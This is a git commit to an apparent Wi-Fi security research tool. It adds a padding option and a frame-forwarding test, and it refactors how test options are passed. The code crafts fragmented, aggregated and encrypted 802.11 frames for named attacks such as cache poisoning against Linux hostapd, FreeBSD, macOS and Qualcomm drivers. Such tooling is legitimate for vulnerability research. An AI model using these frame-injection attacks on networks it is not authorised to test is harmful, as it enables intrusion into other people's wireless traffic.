fragattacks: ability to add trailing data

This commit is contained in:
Mathy 2020-04-29 18:40:41 -04:00 committed by Mathy Vanhoef
parent 4fb673a9ca
commit 609e44b1b8

View File

@ -130,7 +130,7 @@ def freebsd_encap_eapolmsdu(p, src, dst, payload):
# ignored ICMP and ARP packets.
REQ_ARP, REQ_ICMP, REQ_DHCP = range(3)
def generate_request(sta, ptype, prior=2, icmp_size=None):
def generate_request(sta, ptype, prior=2, icmp_size=None, padding=None):
header = sta.get_header(prior=prior)
if ptype == REQ_ARP:
# Avoid using sta.get_peermac() because the correct MAC addresses may not
@ -159,6 +159,9 @@ def generate_request(sta, ptype, prior=2, icmp_size=None):
# We assume DHCP discover is sent towards the AP.
header.addr3 = "ff:ff:ff:ff:ff:ff"
if padding != None and padding >= 1:
request = raw(request) + b"\x00" + b"A" * (padding - 1)
return header, request, check
class Action():
@ -275,7 +278,7 @@ class Test(metaclass=abc.ABCMeta):
def check(self, p):
return False
def set_options(self, delay=None, inc_pn=None):
def set_general_options(self, delay=None, inc_pn=None):
self.delay = delay
self.inc_pn = inc_pn
@ -296,14 +299,16 @@ class Test(metaclass=abc.ABCMeta):
frag.inc_pn = self.inc_pn
class PingTest(Test):
def __init__(self, ptype, fragments, bcast=False, separate_with=None, as_msdu=False, icmp_size=None):
def __init__(self, ptype, fragments, separate_with=None, opt=None):
super().__init__(fragments)
self.ptype = ptype
self.bcast = bcast
self.separate_with = separate_with
self.check_fn = None
self.as_msdu = as_msdu
self.icmp_size = icmp_size
self.bcast = False if opt == None else opt.bcast
self.as_msdu = False if opt == None else opt.as_msdu
self.icmp_size = None if opt == None else opt.icmp_size
self.padding = None if opt == None else opt.padding
def check(self, p):
if self.check_fn == None:
@ -314,7 +319,7 @@ class PingTest(Test):
log(STATUS, "Generating ping test", color="green")
# Generate the header and payload
header, request, self.check_fn = generate_request(station, self.ptype, icmp_size=self.icmp_size)
header, request, self.check_fn = generate_request(station, self.ptype, icmp_size=self.icmp_size, padding=self.padding)
if self.as_msdu == 1:
# Set the A-MSDU frame type flag in the QoS header
@ -365,6 +370,26 @@ class PingTest(Test):
self.actions.insert(i, sep_frag)
class ForwardTest(Test):
def __init__(self):
super().__init__([
Action(Action.Connected, enc=True)
])
self.magic = b"reflected_data"
def check(self, p):
return self.magic in raw(p)
def prepare(self, station):
# We assume we are targetting the AP
header = station.get_header(prior=2)
assert header.FCfield & Dot11(FCfield="to-DS").FCfield != 0
# Set final destination to be us, the client
header.addr3 = station.mac
self.actions[0].frame = header/LLC()/SNAP()/IP()/Raw(self.magic)
class LinuxTest(Test):
def __init__(self, ptype, decoy_tid=None):
super().__init__([
@ -830,7 +855,7 @@ class Daemon(metaclass=abc.ABCMeta):
self.options = options
# Note: some kernels don't support interface names of 15+ characters
self.nic_iface = options.interface
self.nic_iface = options.iface
self.nic_mon = "mon" + self.nic_iface[:12]
self.process = None
@ -1313,17 +1338,18 @@ def stract2action(stract):
raise Exception("Unrecognized action")
def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=None, ptype=None, bcast=False, icmp_size=None):
if test_name == "ping":
def prepare_tests(opt):
stractions = opt.actions
if opt.testname == "ping":
if stractions != None:
actions = [stract2action(stract) for stract in stractions.split(",")]
else:
actions = [Action(Action.Connected, action=Action.GetIp),
Action(Action.Connected, enc=True)]
test = PingTest(REQ_ICMP, actions, as_msdu=as_msdu, bcast=bcast, icmp_size=icmp_size)
test = PingTest(REQ_ICMP, actions, opt=opt)
elif test_name == "ping_frag_sep":
elif opt.testname == "ping_frag_sep":
# Check if we can send frames in between fragments. The seperator by default uses a different
# QoS TID. The second fragment must use an incremental PN compared to the first fragment.
# So this also tests if the receivers uses a per-QoS receive replay counter. By overriding
@ -1334,10 +1360,9 @@ def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=None, ptype=
[Action(Action.Connected, action=Action.GetIp),
Action(Action.Connected, enc=True),
Action(Action.Connected, enc=True, inc_pn=0)],
separate_with=separator, as_msdu=as_msdu, bcast=bcast, icmp_size=icmp_size
)
separate_with=separator, opt=opt)
elif test_name == "wep_mixed_key":
elif opt.testname == "wep_mixed_key":
log(WARNING, "Cannot predict WEP key reotation. Fragment may time out, use very short key rotation!", color="orange")
test = PingTest(REQ_ICMP,
[Action(Action.Connected, action=Action.GetIp),
@ -1346,17 +1371,21 @@ def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=None, ptype=
Action(Action.AfterAuth, enc=True),
])
elif test_name == "cache_poison":
elif opt.testname == "cache_poison":
# Cache poison attack. Worked against Linux Hostapd and RT-AC51U.
test = PingTest(REQ_ICMP,
[Action(Action.Connected, enc=True),
Action(Action.Connected, action=Action.Reconnect),
Action(Action.AfterAuth, enc=True)])
elif test_name == "eapol_msdu":
elif opt.testname == "forward":
test = ForwardTest()
elif opt.testname == "eapol_msdu":
freebsd = False
if stractions != None:
# TODO: Clean up this parsing / specification
stractions = stractions
if stractions.startswith("M,"):
freebsd = True
stractions = stractions[2:]
@ -1371,11 +1400,11 @@ def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=None, ptype=
test = EapolMsduTest(REQ_ICMP, actions, freebsd)
elif test_name == "linux_plain":
elif opt.testname == "linux_plain":
decoy_tid = None if stractions == None else int(stractions)
test = LinuxTest(REQ_ICMP, decoy_tid)
elif test_name == "macos":
elif opt.testname == "macos":
if stractions != None:
actions = [Action(char2trigger(t), enc=False) for t in stractions]
else:
@ -1384,13 +1413,13 @@ def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=None, ptype=
test = MacOsTest(REQ_ICMP, actions)
elif test_name == "qca_test":
elif opt.testname == "qca_test":
test = QcaDriverTest()
elif test_name == "qca_split":
elif opt.testname == "qca_split":
test = QcaTestSplit()
elif test_name == "qca_rekey":
elif opt.testname == "qca_rekey":
test = QcaDriverRekey()
# No valid test ID/name was given
@ -1416,14 +1445,14 @@ def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=None, ptype=
# - Test fragmentation of group frames (STA mode of RT-AC51u?)
# If requested, override delay and inc_pn parameters in the test.
test.set_options(delay, inc_pn)
test.set_general_options(opt.delay, opt.inc_pn)
# If requested, override the ptype
if ptype != None:
if opt.ptype != None:
if not hasattr(test, "ptype"):
log(WARNING, "Cannot override request type of the selected test.")
quit(1)
test.ptype = ptype
test.ptype = opt.ptype
return test
@ -1470,6 +1499,7 @@ if __name__ == "__main__":
parser.add_argument('--dhcp', default=False, action='store_true', help="Override default request with DHCP discover.")
parser.add_argument('--icmp', default=False, action='store_true', help="Override default request with ICMP ping request.")
parser.add_argument('--icmp-size', type=int, default=None, help="Second to wait after AfterAuth before triggering Connected event")
parser.add_argument('--padding', type=int, default=None, help="Add padding data to ARP/DHCP/ICMP requests.")
parser.add_argument('--rekey-request', default=False, action='store_true', help="Actively request PTK rekey as client.")
parser.add_argument('--rekey-plaintext', default=False, action='store_true', help="Do PTK rekey with plaintext EAPOL frames.")
parser.add_argument('--rekey-early-install', default=False, action='store_true', help="Install PTK after sending Msg3 during rekey.")
@ -1478,34 +1508,24 @@ if __name__ == "__main__":
parser.add_argument('--pn-per-qos', default=False, action='store_true', help="Use separate Tx packet counter for each QoS TID.")
parser.add_argument('--freebsd-cache', default=False, action='store_true', help="Sent EAP(OL) frames as (malformed) broadcast EAPOL/A-MSDUs.")
parser.add_argument('--connected-delay', type=int, default=1, help="Second to wait after AfterAuth before triggering Connected event")
args = parser.parse_args()
options = parser.parse_args()
ptype = args2ptype(args)
as_msdu = args2msdu(args)
# Sanity check and convert some arguments to more usable form
options.ptype = args2ptype(options)
options.as_msdu = args2msdu(options)
# Convert parsed options to TestOptions object
options = TestOptions()
options.interface = args.iface
options.ip = args.ip
options.peerip = args.peerip
options.rekey_request = args.rekey_request
options.rekey_plaintext = args.rekey_plaintext
options.rekey_early_install = args.rekey_early_install
options.full_reconnect = args.full_reconnect
options.pn_per_qos = args.pn_per_qos
options.freebsd_cache = args.freebsd_cache
options.connected_delay = args.connected_delay
options.test = prepare_tests(args.testname, args.actions, args.delay, args.inc_pn, as_msdu, ptype, args.bcast, args.icmp_size)
# Construct the test
options.test = prepare_tests(options)
if options.test == None:
log(STATUS, f"Test name/id '{args.testname}' not recognized. Specify a valid test case.")
log(STATUS, f"Test name/id '{options.testname}' not recognized. Specify a valid test case.")
quit(1)
# Parse remaining options
global_log_level -= args.debug
global_log_level -= options.debug
# Now start the tests --- TODO: Inject Deauths before connecting with client...
if args.ap:
if options.ap:
daemon = Authenticator(options)
else:
daemon = Supplicant(options)